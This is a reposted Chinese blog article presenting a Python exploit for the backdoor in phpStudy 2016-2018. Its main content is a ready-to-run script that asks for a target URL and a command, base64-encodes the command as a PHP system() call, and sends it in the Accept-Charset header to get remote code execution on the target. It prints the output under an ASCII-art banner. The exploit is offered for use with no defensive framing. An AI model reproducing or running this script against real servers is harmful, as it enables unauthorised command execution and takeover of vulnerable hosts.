目录
[2016-2018]phpstudy的exp制作

[2016-2018]phpstudy的exp制作

扣脚大汉在网络2023-11-04 16:34

[2016-2018]phpstudy的exp制作

用python的requests模块进行编写

修改请求数据包进行远程代码执行

python 复制代码 
import requests
import base64
def remove_code_execute():
    try:
        url = input("请输入要测试的网址:")
        cmd = input("想要执行的命令:")
        cmd = f"system('{cmd}');"
        cmd = base64.b64encode(cmd.encode()).decode()

        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
            "accept-encoding": "gzip,deflate",
            "accept-charset": f"{cmd}"
        }
        response = requests.get(url=url,headers=headers)
        relust=response.content.decode("GBK")[:response.content.decode("GBK").find("<!D"):1]
    except Exception:
        print("请检查是否是url错误或者命令错误")
        print("请检查操作系统和命令是否匹配")
    else:
        print(f"命令执行结果:\n{relust}")
print("""
        PHPStudy_2016-2018

.............................................:.:..............................................tt,..t
..........................................:tfjjjft:...........................................itt::.
.........................................;fLLLGGLfjt,:.........................................;tj,.
.........:.:.....:.....................:;fLLGGDDGLLfjt:.........................................;ttt
......:.... ........... ...............,fLGGGDEEDGGGGf,..........................................,tt
..##i###.  W:::...L...jjLKff...........:fGDDDDDEDDGGGL,......:. . ...;D.....::...:,:...:....:..t....
..f..L##.# ::.#####WW.itEii ............LDDDGGGjLDEDGfj......jf.,,E L.W##K##W#W#itWjfft#W###Wif#fjjt
...i.jE,:j:iG .:..W...;;D;;;............LGDDDGLjjGEDfi:......# .. D.#L,#::.,Df.::::.K..:iLE...,. G..
...#.. ,.f.jL.,:.#::. .:E...............iGDDDGLfGDDL..........#.::,D#.E#G..#.K.. #L###..#.#:..#EWW#.
..i:fLf,:Lt:L.W E: G.:.:ji::...........:.tGjGGfjLfjf..........;:..L:#: #.;W#####tK..K:.######j#.:D:.
.. ...##.f.##.:#: j.;;#: :K#..............Liiii;tit:........ #..:.E.#i:W.,:.#iW::W,:K,,:.#tE::#,;D:,
........................................jKi;ii;,iit.............,i. G:t,.:D:...j.L.....D:...;.L.....
......................................DEWKKjiiijti..................:.:....:... .:......:.....::....
.....................................:EKKWWEijLfftL,i................ .....:. :.....................
.................................jKKD::KKWWKGtjjtDW:fE,.......####.:..#.. .:t.E.....................
................................iKKKKD:DWWWWWf;itWKL:KKG:.....WWWK.,ii#iit...,:.....................
...............................:KKKKKKiiWWKWWWKKWWKE:KKKK:....###W....W:.:.,,;,;....................
..............................:EKKKKKKE;WWWEKWWWWWWE:KKKKK:..######..::.. :,,;,,....................
...............................KKKKKKKWiWWWWKKKWWWWD,KKKWKK...K.##K::#:L .ii;Eit....................
..............................tKKKKKWWWiWWWWWWWKKKEjfGKWWWW::L Gi,:.#:E.Dj.L;:#:....................
.............................:KKKWWKWWWjWWWWWWWWWWW;WWEWWWWK;:..:.:.:..:....:: .:...................
............................,KKWWWWWWWEKWWWWWWWWWWLjWWWWWWWKWD......................................
.........................:KKKWWWWWWWjfWWWWWWWWWWDLKW.,DWWWWWKKKKKKKG:...............................
.......................GKKKKWWWWWLiEWWWWWWWWWWt;..............:LWKKKKKKKKE:.........................
.....................:jKWKKKWWWWfiDWWWWWWWWWWG,.................:jWKKKKKKKKi........................
.....................;KKKKKWWWWLtGWWWWWWWWWWDi...................:.iKKWKKKKKG.......................
....................,EKKKKKKKWWGLWWWWWWWWWKLL:......................:fWWKKKKK.......................
...................:LKKKKWELLGLEWWWWWWWWWKEj.......................,tititLKEEj:.....................
..................:iKKKKKLfffLGEDDEKKKKEEED:......................itttiiiiL;iD......................
..................,KKKKKj.jffLLGDGGGDGGDDDEEt....................jjtttiiiij;Li......................
.................,GKKKK;::fLLGGGGGGGDGGDDDDDG,.................:.jjtLiiiittjLt......................
,:.............,GKWE;:...:GGGGGGGGGGGGGGGGGGG;..................Ljjjttttftjjfi......................
,,:...........,LWKK;:....:LGGGLLLLLLLLLLLLGLLt..................GffjjjjLjjjfLt:.....................
,,,,:........:iKKKf:......fffLLLLLLLLLLLLLLLff:.................tfLfjjfLjfffL,...............::.::..
,,,,,........,GKWWt:......fffLLLGGGLLLLLLLffffj.................:LLfffLffffL;................::.::..
,,,,,,:......,KKWWi......:ffffLGGGGGGLLLLLLffff..................;LLLLfffLLj.................::.....
,,,,,,,:...:,;;LWK;.......ffffffLLDEGDDGGLLfffji:.................iGLLLLLLt.........................
,,,,,,,,:..:i;;iii:.......fffffffLG:.DDDGLLffjjj:.................:.tLLGf:......:::.................
,,,,,,,,,::;iii,:;:.......LffffffLL..fDDGLLLffjj;..................:.:.:....:.....:.................
,,,,,,,,,,,,ii;:,;:.......;fffjjjfL...EDGGLLfjjjj.....................................::.........:..
,,,,,,,,,,,ii;,::;:........fffjjjfL...tGGGLffjjjj:............:.....................................
,,,,,,,,,,,ii,,...:........fffjjjfL...:GGGLffjjjjt................:::...............................
,,,,,,,,,,,,;;,............jfjjjjjL.....GGLLfjjjjf............:.........:.........................::
,,,,,,,,,,,,,,,............;fjjjjjf...::jGLLffjjjf......................:.........................::
,,,,,,,,,,,,,,,,:...........fjjjjjf:.....GLLffjjjj;.........:,;.WG,:j:W...........D:f. ...........::
,,,,,,,,,,,,,,,,,:..........jjjjjjj;...:.,LLffjjjjf...........:.t.::W,   ,WW#WW#,..K..:.:......:::..
,,,,,,,,,,,,,,,,,,:.........jjjjjjjj...:..tLffjjjff..........fK..#:jW..W.,.:fi:::..K..:.::...::::...



                                                    --xl
        frist : please your url
        sec   : please input your command
        """)
remove_code_execute()
本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
Bug.ink4 天前
RCE——回调后门
网络安全·rce
漫步企鹅8 天前
【漏洞修复】为了修复ARM64 Android10系统的第三方库漏洞,将ARM64 Android16的系统库直接拷贝到Android10系统如何?
android·漏洞·修复·系统库
Komorebi.py8 天前
RCE学习:一些技巧
学习·安全·rce
与神明画鸭10 天前
常见框架漏洞:Thinkphp(TP)篇
漏洞·thinkphp·tp
Gobysec23 天前
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
tomcat·apache·poc·exp·漏洞扫描工具·漏洞验证·cve-2025-24813
晓翔仔25 天前
利用 requestrepo 工具验证 XML外部实体注入漏洞
xml·网络安全·信息安全·渗透测试·漏洞
渗透测试老鸟-九青1 个月前
基于Electron的应用程序安全测试基础 — 提取和分析.asar文件的案例研究
网络·数据仓库·hive·hadoop·安全·网络安全·漏洞
星尘安全2 个月前
黑客利用 Telegram API 传播新的 Golang 后门
网络安全·黑客·漏洞·远控·后门
饮长安千年月2 个月前
西湖论剑决赛IoT开发板 rce复现
物联网·网络安全·漏洞
core5122 个月前
“可通过HTTP获取远端WWW服务信息”漏洞修复
nginx·漏洞·openresty·可通过http·获取远端www服务信息
热门推荐
01我决定放弃搞 Java 了02DeepSeek各版本说明与优缺点分析03如何在WPS和Word/Excel中直接使用DeepSeek功能04汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量05RAG 实践- Ollama+RagFlow 部署本地知识库06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07木马学习记录08本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程09DeepSeek RAGFlow构建本地知识库系统10【AUTOSAR 基础软件】Can模块详解(Can栈之驱动模块)